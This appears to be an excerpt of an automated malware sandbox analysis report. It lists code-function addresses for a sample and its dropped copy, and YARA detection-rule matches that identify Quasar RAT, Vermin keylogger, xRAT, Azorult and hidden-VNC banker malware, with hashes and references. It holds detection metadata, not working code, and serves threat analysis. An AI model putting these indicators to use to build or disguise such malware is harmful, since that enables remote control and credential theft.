Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A58808
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A621C5
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A6F1D9
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A6D975
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A61978
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A41287
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A762D2
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A6CB21
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A61484
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A7242E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A6BDA6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A76DB6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A61D90
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A625FA
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00AC7DDB
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A55520
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A566E1
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A56F9E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A55760
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process Stats: CPU usage > 98%
Source: CVbJSUXraQ.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: CVbJSUXraQ.exe, type: SAMPLE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: CVbJSUXraQ.exe, type: SAMPLE | Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: CVbJSUXraQ.exe, type: SAMPLE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
